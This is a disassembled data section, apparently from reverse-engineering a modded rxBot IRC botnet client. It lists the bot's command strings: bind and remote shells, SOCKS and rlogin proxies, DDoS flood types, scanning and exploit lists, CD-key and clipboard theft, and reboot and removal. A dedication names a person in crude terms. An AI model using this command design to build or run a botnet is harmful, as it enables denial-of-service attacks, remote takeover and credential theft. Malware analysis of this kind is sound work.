aPasswordAccept db 'Password accepted.',0
align 10h
unk_440010 db 2Dh ; - ; DATA XREF: sub_401CC7+7FD1�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedIn_ db 'User: %s logged in.',0
; char a332_3[]
a332_3 db '332',0 ; DATA XREF: sub_401CC7+AC5�o
; char asc_440034[]
asc_440034 db ' :',0 ; DATA XREF: sub_401CC7:loc_4027E4�o
align 4
; char aD[]
aD db '$%d-',0 ; DATA XREF: sub_401CC7+B7B�o
align 10h
; char aD_0[]
aD_0 db '$%d',0 ; DATA XREF: sub_401CC7+C3F�o
; char aMe[]
aMe db '$me',0 ; DATA XREF: sub_401CC7+CB1�o
; char aUser[]
aUser db '$user',0 ; DATA XREF: sub_401CC7+CC3�o
align 10h
; char aChan[]
aChan db '$chan',0 ; DATA XREF: sub_401CC7+CD4�o
align 4
; char aRndnick[]
aRndnick db '$rndnick',0 ; DATA XREF: sub_401CC7+CF0�o
align 4
; char aServer[]
aServer db '$server',0 ; DATA XREF: sub_401CC7+D01�o
; char aChr[]
aChr db '$chr(',0 ; DATA XREF: sub_401CC7+D0C�o
align 4
; char aChr_0[]
aChr_0 db '$chr(',0 ; DATA XREF: sub_401CC7+D25�o
align 4
; char asc_44007C[]
asc_44007C: ; DATA XREF: sub_401CC7+D4D�o
unicode 0, <)>,0
; char a63[]
a63 db '63',0 ; DATA XREF: sub_401CC7+D75�o
align 4
; char asc_440084[]
asc_440084: ; DATA XREF: sub_401CC7+E4D�o
unicode 0, < >,0
; char asc_440088[]
asc_440088: ; DATA XREF: sub_401CC7:loc_402B35�o
unicode 0, < >,0
; char aRndnick_0[]
aRndnick_0 db 'rndnick',0 ; DATA XREF: sub_401CC7+EA8�o
; char aRn[]
aRn db 'rn',0 ; DATA XREF: sub_401CC7+EC0�o
align 4
; char aNickS_8[]
aNickS_8 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7E2C�o
align 4
; char asc_4400A4[]
asc_4400A4 db '-' ; DATA XREF: sub_401CC7+7E43�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRandomNickChan db 'Random nick change: %s',0
align 4
; char aDie[]
aDie db 'die',0 ; DATA XREF: sub_401CC7+ED5�o
; char aD_1[]
aD_1 db 'd',0 ; DATA XREF: sub_401CC7+EEA�o
align 10h
; char a332_4[]
a332_4 db '332',0 ; DATA XREF: sub_401CC7+2F26�o
; char aLogout[]
aLogout db 'logout',0 ; DATA XREF: sub_401CC7+EFF�o
align 4
; char aLo[]
aLo db 'lo',0 ; DATA XREF: sub_401CC7+F14�o
align 10h
; char asc_4400E0[]
asc_4400E0 db '-' ; DATA XREF: sub_401CC7+2EAD�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedO_1 db 'User %s logged out.',0
unk_440100 db 2Dh ; - ; DATA XREF: sub_401CC7+2EC3�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aNoUserLoggedIn db 'No user logged in at slot: %d.',0
align 4
unk_44012C db 2Dh ; - ; DATA XREF: sub_401CC7+2ECB�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aInvalidLoginSl db 'Invalid login slot number: %d.',0
align 4
; char asc_440158[]
asc_440158 db '-' ; DATA XREF: sub_401CC7+2F0A�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedO_2 db 'User %s logged out.',0
; char aVersion[]
aVersion db 'version',0 ; DATA XREF: sub_401CC7+F29�o
; char aVer[]
aVer db 'ver',0 ; DATA XREF: sub_401CC7+F3E�o
dword_440184 dd 234032Dh, 6E69616Dh, 202D0302h, 7325h ; DATA XREF: sub_401CC7+2E6E�o
; char aDedication[]
aDedication db 'dedication',0 ; DATA XREF: sub_401CC7+F53�o
align 10h
; char aDed[]
aDed db 'ded',0 ; DATA XREF: sub_401CC7+F68�o
unk_4401A4 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_404B26�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aThisModOfRxbot db 'This mod of rxBot is dedicated to Pia Gerhardt (nameless@efnet/ir'
db 'cnet), the Beautiful Operatress from Heaven (or Bitch Operatress '
db 'from Hell?) who I love so much.',0
align 4
; char aSpeedtest[]
aSpeedtest db 'speedtest',0 ; DATA XREF: sub_401CC7+F7D�o
align 10h
; char aSt[]
aSt db 'st',0 ; DATA XREF: sub_401CC7+F92�o
align 4
; char aSecure[]
aSecure db 'secure',0 ; DATA XREF: sub_401CC7+FA7�o
align 4
; char aSec[]
aSec db 'sec',0 ; DATA XREF: sub_401CC7+FBC�o
; char aUnsecure[]
aUnsecure db 'unsecure',0 ; DATA XREF: sub_401CC7+FD1�o
align 4
; char aUnsec[]
aUnsec db 'unsec',0 ; DATA XREF: sub_401CC7+FE6�o
align 4
; char aSecure_1[]
aSecure_1 db 'secure',0 ; DATA XREF: sub_401CC7+2D49�o
align 4
; char aSec_0[]
aSec_0 db 'sec',0 ; DATA XREF: sub_401CC7+2D5A�o
aSecuring db 'Securing',0 ; DATA XREF: sub_401CC7+2DB5�o
align 4
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_401CC7+2DBC�o
align 4
; char asc_4402A8[]
asc_4402A8 db '-' ; DATA XREF: sub_401CC7+2DC2�o
db 3, 34h, 2
dd 75636573h, 3026572h, 7325202Dh, 73797320h, 2E6D6574h
dd 0
dword_4402C4 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_401CC7+2E3C�o
aFailedToStar_0 db '- Failed to start secure thread, error: <%d>.',0
align 10h
; char aBindshell[]
aBindshell db 'bindshell',0 ; DATA XREF: sub_401CC7+FFB�o
align 4
; char aBd[]
aBd db 'bd',0 ; DATA XREF: sub_401CC7+1010�o
align 10h
; char asc_440310[]
asc_440310 db '-' ; DATA XREF: sub_401CC7+2CBA�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aServerStartedO db ' Server started on: %s:%d.',0
align 4
unk_44033C db 2Dh ; - ; DATA XREF: sub_401CC7+2D3E�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFailedToStar_1 db ' Failed to start server thread, error: <%d>.',0
align 4
; char aBindshellstop[]
aBindshellstop db 'bindshellstop',0 ; DATA XREF: sub_401CC7+1025�o
align 4
aServer_0 db 'Server',0 ; DATA XREF: sub_401CC7+103E�o
align 4
dword_440394 dd 234032Dh, 646E6962h, 6C656873h, 2D03026Ch, 0
; DATA XREF: sub_401CC7+1043�o
; char aSocks4[]
aSocks4 db 'socks4',0 ; DATA XREF: sub_401CC7+1065�o
align 10h
; char aS4[]
aS4 db 's4',0 ; DATA XREF: sub_401CC7+107A�o
align 4
; char asc_4403B4[]
asc_4403B4 db '-' ; DATA XREF: sub_401CC7+2BC9�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aServerStarte_0 db '- Server started on: %s:%d.',0
dword_4403DC dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_401CC7+2C38�o
aFailedToStar_2 db '- Failed to start server thread, error: <%d>.',0
align 4
; char aSocks4stop[]
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_401CC7+108F�o
align 4
aServer_1 db 'Server',0 ; DATA XREF: sub_401CC7+10A8�o
align 4
dword_44042C dd 234032Dh, 6B636F73h, 3023473h, 2Dh ; DATA XREF: sub_401CC7+10AD�o
; char aRloginstop[]
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_401CC7+10B5�o
align 4
aServer_2 db 'Server',0 ; DATA XREF: sub_401CC7+10CE�o
align 10h
dword_440450 dd 234032Dh, 676F6C72h, 2646E69h, 2D03h ; DATA XREF: sub_401CC7+10D3�o
; char aHttpstop[]
aHttpstop db 'httpstop',0 ; DATA XREF: sub_401CC7+10DE�o
align 4
aServer_3 db 'Server',0 ; DATA XREF: sub_401CC7+10F7�o
align 4
dword_440474 dd 234032Dh, 70747468h, 2D030264h, 0 ; DATA XREF: sub_401CC7+10FC�o
; char aLogstop[]
aLogstop db 'logstop',0 ; DATA XREF: sub_401CC7+1107�o
aLogList db 'Log list',0 ; DATA XREF: sub_401CC7+1120�o
align 4
dword_440498 dd 234032Dh, 2676F6Ch, 2D03h ; DATA XREF: sub_401CC7+1125�o
; char aRedirectstop[]
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_401CC7+1130�o
align 4
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_401CC7+1149�o
align 4
dword_4404C4 dd 234032Dh, 69646572h, 74636572h, 2D0302h ; DATA XREF: sub_401CC7+114E�o
; char aDdos_stop[]
aDdos_stop db 'ddos.stop',0 ; DATA XREF: sub_401CC7+1159�o
align 10h
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_401CC7+1172�o
align 4
dword_4404EC dd 234032Dh, 736F6464h, 2D0302h ; DATA XREF: sub_401CC7+1177�o
; char aSynstop[]
aSynstop db 'synstop',0 ; DATA XREF: sub_401CC7+1182�o
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_401CC7+119B�o
align 4
dword_44050C dd 234032Dh, 26E7973h, 2D03h ; DATA XREF: sub_401CC7+11A0�o
; char aSkysynstop[]
aSkysynstop db 'skysynstop',0 ; DATA XREF: sub_401CC7+11AB�o
align 4
aSkysynFlood db 'SkySyn flood',0 ; DATA XREF: sub_401CC7+11C4�o
align 4
dword_440534 dd 234032Dh, 73796B73h, 3026E79h, 2Dh ; DATA XREF: sub_401CC7+11C9�o
; char aTarga3stop[]
aTarga3stop db 'targa3stop',0 ; DATA XREF: sub_401CC7+11D4�o
align 10h
aTarga3Flood db 'Targa3 flood',0 ; DATA XREF: sub_401CC7+11ED�o
align 10h
dword_440560 dd 234032Dh, 67726174h, 3023361h, 2Dh ; DATA XREF: sub_401CC7+11F2�o
; char aWonkstop[]
aWonkstop db 'wonkstop',0 ; DATA XREF: sub_401CC7+11FD�o
align 4
aWonkFlood db 'Wonk flood',0 ; DATA XREF: sub_401CC7+1216�o
align 4
dword_440588 dd 234032Dh, 6B6E6F77h, 2D0302h ; DATA XREF: sub_401CC7+121B�o
; char aPacketstop[]
aPacketstop db 'packetstop',0 ; DATA XREF: sub_401CC7+1226�o
align 10h
aDdosFlood_0 db 'DDoS flood',0 ; DATA XREF: sub_401CC7+1247�o
align 4
dword_4405AC dd 234032Dh, 736F6464h, 2D0302h ; DATA XREF: sub_401CC7+124C�o
aSynFlood_0 db 'Syn flood',0 ; DATA XREF: sub_401CC7+1265�o
align 4
dword_4405C4 dd 234032Dh, 26E7973h, 2D03h ; DATA XREF: sub_401CC7+126A�o
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_401CC7+1286�o
align 4
dword_4405DC dd 234032Dh, 2706475h, 2D03h ; DATA XREF: sub_401CC7+128B�o
aPingFlood db 'Ping flood',0 ; DATA XREF: sub_401CC7+12A4�o
align 4
dword_4405F4 dd 234032Dh, 676E6970h, 2D0302h ; DATA XREF: sub_401CC7+12A9�o
aTarga3Flood_0 db 'Targa3 flood',0 ; DATA XREF: sub_401CC7+12C5�o
align 10h
dword_440610 dd 234032Dh, 67726174h, 3023361h, 2Dh ; DATA XREF: sub_401CC7+12CA�o
aWonkFlood_0 db 'Wonk flood',0 ; DATA XREF: sub_401CC7+12E3�o
align 4
dword_44062C dd 234032Dh, 6B6E6F77h, 2D0302h ; DATA XREF: sub_401CC7+12E8�o
aTsunamiFlood db 'Tsunami flood',0 ; DATA XREF: sub_401CC7+1304�o
align 4
dword_440648 dd 234032Dh, 6E757374h, 2696D61h, 2D03h ; DATA XREF: sub_401CC7+1309�o
aWisdomAttack db 'Wisdom attack',0 ; DATA XREF: sub_401CC7+1322�o
align 4
dword_440668 dd 234032Dh, 64736977h, 3026D6Fh, 2Dh ; DATA XREF: sub_401CC7+1327�o
aSkysynFlood_0 db 'SkySyn flood',0 ; DATA XREF: sub_401CC7+1343�o
align 4
dword_440688 dd 234032Dh, 73796B73h, 3026E79h, 2Dh ; DATA XREF: sub_401CC7+1348�o
unk_440698 db 2Dh ; - ; DATA XREF: sub_401CC7+1362�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aAllPacketingAc db 'All packeting activity has been halted.',0
; char aTsunamistop[]
aTsunamistop db 'tsunamistop',0 ; DATA XREF: sub_401CC7+137C�o
aTsunamiFlood_0 db 'Tsunami flood',0 ; DATA XREF: sub_401CC7+1395�o
align 4
dword_4406E8 dd 234032Dh, 6E757374h, 2696D61h, 2D03h ; DATA XREF: sub_401CC7+139A�o
; char aWisdomstop[]
aWisdomstop db 'wisdomstop',0 ; DATA XREF: sub_401CC7+13A5�o
align 4
aWisdomAttack_0 db 'Wisdom attack',0 ; DATA XREF: sub_401CC7+13BE�o
align 4
dword_440714 dd 234032Dh, 64736977h, 3026D6Fh, 2Dh ; DATA XREF: sub_401CC7+13C3�o
; char aUdpstop[]
aUdpstop db 'udpstop',0 ; DATA XREF: sub_401CC7+13CE�o
aUdpFlood_0 db 'UDP flood',0 ; DATA XREF: sub_401CC7+13E7�o
align 4
dword_440738 dd 234032Dh, 2706475h, 2D03h ; DATA XREF: sub_401CC7+13EC�o
; char aPingstop[]
aPingstop db 'pingstop',0 ; DATA XREF: sub_401CC7+13F7�o
align 10h
aPingFlood_0 db 'Ping flood',0 ; DATA XREF: sub_401CC7+1410�o
align 4
dword_44075C dd 234032Dh, 676E6970h, 2D0302h ; DATA XREF: sub_401CC7+1415�o
; char aTftpstop[]
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_401CC7+1420�o
align 4
aServer_4 db 'Server',0 ; DATA XREF: sub_401CC7+1439�o
align 4
dword_44077C dd 234032Dh, 70746674h, 2D030264h, 0 ; DATA XREF: sub_401CC7+143E�o
; char aFindfilestop[]
aFindfilestop db 'findfilestop',0 ; DATA XREF: sub_401CC7+1449�o
align 4
; char aFfstop[]
aFfstop db 'ffstop',0 ; DATA XREF: sub_401CC7+145E�o
align 4
aFindFile db 'Find file',0 ; DATA XREF: sub_401CC7+2B11�o
align 10h
dword_4407B0 dd 234032Dh, 646E6966h, 656C6966h, 2D0302h ; DATA XREF: sub_401CC7+2B16�o
; char aProcsstop[]
aProcsstop db 'procsstop',0 ; DATA XREF: sub_401CC7+1473�o
align 4
; char aPsstop[]
aPsstop db 'psstop',0 ; DATA XREF: sub_401CC7+1488�o
align 4
aProcessList db 'Process list',0 ; DATA XREF: sub_401CC7+2AF9�o
align 4
dword_4407E4 dd 234032Dh, 636F7270h, 2D030273h, 0 ; DATA XREF: sub_401CC7+2AFE�o
; char aClonestop[]
aClonestop db 'clonestop',0 ; DATA XREF: sub_401CC7+149D�o
align 10h
aClone db 'Clone',0 ; DATA XREF: sub_401CC7+14B6�o
align 4
dword_440808 dd 234032Dh, 6E6F6C63h, 3027365h, 2Dh ; DATA XREF: sub_401CC7+14BB�o
; char aSecurestop[]
aSecurestop db 'securestop',0 ; DATA XREF: sub_401CC7+14C6�o
align 4
aSecure_0 db 'Secure',0 ; DATA XREF: sub_401CC7+14DF�o
align 4
dword_44082C dd 234032Dh, 75636573h, 3026572h, 2Dh ; DATA XREF: sub_401CC7+14E4�o
; char aScanstop[]
aScanstop db 'scanstop',0 ; DATA XREF: sub_401CC7+14EF�o
align 4
aScan db 'Scan',0 ; DATA XREF: sub_401CC7+1508�o
align 10h
dword_440850 dd 234032Dh, 6E616373h, 2D0302h ; DATA XREF: sub_401CC7+150D�o
; char aScanstats[]
aScanstats db 'scanstats',0 ; DATA XREF: sub_401CC7+1518�o
align 4
; char aStats[]
aStats db 'stats',0 ; DATA XREF: sub_401CC7+152D�o
align 10h
; char aTransferstats[]
aTransferstats db 'transferstats',0 ; DATA XREF: sub_401CC7+1542�o
align 10h
; char aTrstats[]
aTrstats db 'trstats',0 ; DATA XREF: sub_401CC7+1557�o
; char aConnectbacksta[]
aConnectbacksta db 'connectbackstats',0 ; DATA XREF: sub_401CC7+156C�o
align 4
; char aCbstats[]
aCbstats db 'cbstats',0 ; DATA XREF: sub_401CC7+1581�o
; char aExploitlist[]
aExploitlist db 'exploitlist',0 ; DATA XREF: sub_401CC7+1596�o
; char aExplist[]
aExplist db 'explist',0 ; DATA XREF: sub_401CC7+15AB�o
; char aReconnect[]
aReconnect db 'reconnect',0 ; DATA XREF: sub_401CC7+15C0�o
align 4
; char aR[]
aR: ; DATA XREF: sub_401CC7+15D5�o
unicode 0, <r>,0
; char aQuitReconnecti[]
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401CC7:loc_404740�o
align 10h
dword_4408E0 dd 234032Dh, 6E69616Dh, 202D0302h, 6F636552h, 63656E6Eh
; DATA XREF: sub_401CC7+2A86�o
dd 676E6974h, 2Eh
; char aDisconnect[]
aDisconnect db 'disconnect',0 ; DATA XREF: sub_401CC7+15EA�o
align 4
; char aDc[]
aDc db 'dc',0 ; DATA XREF: sub_401CC7+15FF�o
align 4
; char aQuitDisconnect[]
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401CC7:loc_40471E�o
align 4
dword_440924 dd 234032Dh, 6E69616Dh, 202D0302h, 63736944h, 656E6E6Fh
; DATA XREF: sub_401CC7+2A64�o
dd 6E697463h, 2E67h
; char aQuit_0[]
aQuit_0 db 'quit',0 ; DATA XREF: sub_401CC7+1614�o
align 4
; char aQ[]
aQ: ; DATA XREF: sub_401CC7+1629�o
unicode 0, <q>,0
; char aQuitS[]
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+2A2F�o
align 4
; char aQuitLater[]
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_401CC7:loc_404708�o
align 4
; char aStatus[]
aStatus db 'status',0 ; DATA XREF: sub_401CC7+163E�o
align 10h
; char aS_2[]
aS_2: ; DATA XREF: sub_401CC7+1653�o
unicode 0, <s>,0
unk_440974 db 2Dh ; - ; DATA XREF: sub_401CC7+2A08�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aStatusReady_Bo db 'Status: Ready. Bot Uptime: %s.',0
align 10h
; char aId[]
aId db 'id',0 ; DATA XREF: sub_401CC7+1668�o
align 4
; char aI_0[]
aI_0 db 'i',0 ; DATA XREF: sub_401CC7+167D�o
align 4
; char asc_4409A8[]
asc_4409A8 db '-' ; DATA XREF: sub_401CC7+29C9�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 20746F42h, 203A4449h, 2E7325h
; char aReboot[]
aReboot db 'reboot',0 ; DATA XREF: sub_401CC7+1692�o
align 4
; char asc_4409C8[]
asc_4409C8 db '-' ; DATA XREF: sub_401CC7+16A9�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRebootingSyste db 'Rebooting system.',0
align 4
unk_4409E8 db 2Dh ; - ; DATA XREF: sub_401CC7+16B0�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToReboot db 'Failed to reboot system.',0
align 10h
; char aThreads[]
aThreads db 'threads',0 ; DATA XREF: sub_401CC7+16E4�o
; char aT[]
aT: ; DATA XREF: sub_401CC7+16F9�o
unicode 0, <t>,0
; char aSub[]
aSub db 'sub',0 ; DATA XREF: sub_401CC7+2925�o
; char asc_440A20[]
asc_440A20 db '-' ; DATA XREF: sub_401CC7+294B�o
db 3, 34h, 2
dd 65726874h, 2736461h, 4C202D03h, 20747369h, 65726874h
dd 2E736461h, 0
unk_440A40 db 2Dh ; - ; DATA XREF: sub_401CC7+29BA�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToStartL db '- Failed to start list thread, error: <%d>.',0
align 4
; char aAliases[]
aAliases db 'aliases',0 ; DATA XREF: sub_401CC7+170E�o
; char aAl[]
aAl db 'al',0 ; DATA XREF: sub_401CC7+1723�o
align 4
dword_440A88 dd 234032Dh, 6E69616Dh, 202D0302h, 61696C41h, 696C2073h
; DATA XREF: sub_401CC7+28D3�o
dd 2E7473h
; char aLog[]
aLog db 'log',0 ; DATA XREF: sub_401CC7+1738�o
; char aLg[]
aLg db 'lg',0 ; DATA XREF: sub_401CC7+174D�o
align 4
; char aS_36[]
aS_36 db '%s',0 ; DATA XREF: sub_401CC7+27F5�o
align 4
; char asc_440AAC[]
asc_440AAC db '-' ; DATA XREF: sub_401CC7+2849�o
db 3, 34h, 2
dd 2676F6Ch, 4C202D03h, 69747369h, 6C20676Eh, 2E676Fh
unk_440AC4 db 2Dh ; - ; DATA XREF: sub_401CC7+28B8�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedToStar_3 db '- Failed to start listing thread, error: <%d>.',0
; char aClearlog[]
aClearlog db 'clearlog',0 ; DATA XREF: sub_401CC7+1762�o
align 4
; char aClg[]
aClg db 'clg',0 ; DATA XREF: sub_401CC7+1777�o
; char aNetinfo[]
aNetinfo db 'netinfo',0 ; DATA XREF: sub_401CC7+178C�o
; char aNi[]
aNi db 'ni',0 ; DATA XREF: sub_401CC7+17A1�o
align 4
dword_440B18 dd 234032Dh, 6E69616Dh, 202D0302h, 7774654Eh, 206B726Fh
; DATA XREF: sub_401CC7+27A4�o
dd 6F666E49h, 2Eh
; char aSysinfo[]
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_401CC7+17B6�o
; char aSi[]
aSi db 'si',0 ; DATA XREF: sub_401CC7+17CB�o
align 10h
dword_440B40 dd 234032Dh, 6E69616Dh, 202D0302h, 74737953h, 49206D65h
; DATA XREF: sub_401CC7+2775�o
dd 2E6F666Eh, 0
; char aRemove[]
aRemove db 'remove',0 ; DATA XREF: sub_401CC7+17E0�o
align 4
; char aRm[]
aRm db 'rm',0 ; DATA XREF: sub_401CC7+17F5�o
align 4
dword_440B68 dd 234032Dh, 6E69616Dh, 202D0302h, 6F6D6552h, 676E6976h
; DATA XREF: sub_401CC7+2720�o
dd 746F4220h, 2Eh
; char aProcs[]
aProcs db 'procs',0 ; DATA XREF: sub_401CC7+180A�o
align 4
; char aPs[]
aPs db 'ps',0 ; DATA XREF: sub_401CC7+181F�o
align 10h
unk_440B90 db 2Dh ; - ; DATA XREF: sub_401CC7+260D�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aAlreadyRunning db ' Already running.',0
align 10h
; char aFull[]
aFull db 'full',0 ; DATA XREF: sub_401CC7+266F�o
align 4
; char asc_440BB8[]
asc_440BB8 db '-' ; DATA XREF: sub_401CC7+268F�o
db 3, 34h, 2
dd 636F7270h, 2D030273h, 6F725020h, 73656363h, 696C2073h
dd 2E7473h
; char asc_440BD4[]
asc_440BD4 db '-' ; DATA XREF: sub_401CC7+2704�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToStar_4 db ' Failed to start listing thread, error: <%d>.',0
align 10h
; char aGetcdkeys[]
aGetcdkeys db 'getcdkeys',0 ; DATA XREF: sub_401CC7+1834�o
align 4
; char aKey[]
aKey db 'key',0 ; DATA XREF: sub_401CC7+1849�o
dword_440C20 dd 234032Dh, 656B6463h, 3027379h ; DATA XREF: sub_401CC7+25EA�o
aSearchComplete db '- Search completed.',0
; char aUptime[]
aUptime db 'uptime',0 ; DATA XREF: sub_401CC7+185E�o
align 4
; char aUp[]
aUp db 'up',0 ; DATA XREF: sub_401CC7+1873�o
align 4
; char asc_440C4C[]
asc_440C4C db '-' ; DATA XREF: sub_401CC7+259E�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 69747055h, 203A656Dh, 2E7325h
; char aDriveinfo[]
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_401CC7+1888�o
align 10h
; char aDrv[]
aDrv db 'drv',0 ; DATA XREF: sub_401CC7+189D�o
; char aTestdlls[]
aTestdlls db 'testdlls',0 ; DATA XREF: sub_401CC7+18B2�o
align 10h
; char aDll[]
aDll db 'dll',0 ; DATA XREF: sub_401CC7+18C7�o
; char aOpencmd[]
aOpencmd db 'opencmd',0 ; DATA XREF: sub_401CC7+18DC�o
; char aOcmd[]
aOcmd db 'ocmd',0 ; DATA XREF: sub_401CC7+18F1�o
align 4
unk_440C94 db 2Dh ; - ; DATA XREF: sub_401CC7+24E5�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellAlr db '- Remote shell already running.',0
align 10h
unk_440CC0 db 2Dh ; - ; DATA XREF: sub_401CC7+2504�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldnTOpenRem db '- Couldn',27h,'t open remote shell.',0
align 4
unk_440CE8 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_4041D5�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellRea db '- Remote shell ready.',0
align 4
; char aCmdstop[]
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_401CC7+1906�o
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_401CC7+191F�o
align 10h
dword_440D20 dd 234032Dh, 2646D63h, 2D03h ; DATA XREF: sub_401CC7+1924�o
; char aWho[]
aWho db 'who',0 ; DATA XREF: sub_401CC7+192F�o
dword_440D30 dd 234032Dh, 69676F6Ch, 696C206Eh, 3027473h, 2Dh
; DATA XREF: sub_401CC7+194C�o
aEmpty db '<Empty>',0 ; DATA XREF: sub_401CC7:loc_40363E�o
; char aD_S[]
aD_S db '%d. %s',0 ; DATA XREF: sub_401CC7+1986�o
align 4
unk_440D54 db 2Dh ; - ; DATA XREF: sub_401CC7+19BE�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aLoginListCompl db 'Login list complete.',0
align 4
; char aGetclip[]
aGetclip db 'getclip',0 ; DATA XREF: sub_401CC7+1A4C�o
; char aGc[]
aGc db 'gc',0 ; DATA XREF: sub_401CC7+1A61�o
align 4
dword_440D84 dd 234032Dh, 70696C63h, 72616F62h, 61642064h, 3026174h
; DATA XREF: sub_401CC7+24A1�o
dd 2Dh
dword_440D9C dd 234032Dh, 6E69616Dh, 202D0302h, 20746547h, 70696C43h
; DATA XREF: sub_401CC7+24CF�o
dd 72616F62h, 2E64h
; char aFlusharp[]
aFlusharp db 'flusharp',0 ; DATA XREF: sub_401CC7+1A76�o
align 4
; char aFarp[]
aFarp db 'farp',0 ; DATA XREF: sub_401CC7+1A8B�o
align 4
unk_440DCC db 2Dh ; - ; DATA XREF: sub_401CC7+248A�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheFlushe db 'ARP cache flushed.',0
align 10h
unk_440DF0 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_404158�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushA db 'Failed to flush ARP cache.',0
align 4
; char aFlushdns[]
aFlushdns db 'flushdns',0 ; DATA XREF: sub_401CC7+1AA0�o
align 4
; char aFdns[]
aFdns db 'fdns',0 ; DATA XREF: sub_401CC7+1AB5�o
align 10h
unk_440E30 db 2Dh ; - ; DATA XREF: sub_401CC7+2458�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aDnsCacheFlushe db 'DNS cache flushed.',0
align 4
unk_440E54 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_404126�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushD db 'Failed to flush DNS cache.',0
align 10h
; char asc_440E80[]
asc_440E80 db '-' ; DATA XREF: sub_401CC7:loc_40412D�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToLoadDn db 'Failed to load dnsapi.dll.',0
align 4
; char aCurrentip[]
aCurrentip db 'currentip',0 ; DATA XREF: sub_401CC7+1ACA�o
align 4
; char aCip[]
aCip db 'cip',0 ; DATA XREF: sub_401CC7+1ADF�o
; char aRloginserver[]
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_401CC7+1AF4�o
align 4
; char aRlogin[]
aRlogin db 'rlogin',0 ; DATA XREF: sub_401CC7+1B09�o
align 4
; char asc_440ED4[]
asc_440ED4 db '-' ; DATA XREF: sub_401CC7+2396�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aServerListenin db '- Server listening on IP: %s:%d, Username: %s.',0
unk_440F10 db 2Dh ; - ; DATA XREF: sub_401CC7+2405�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
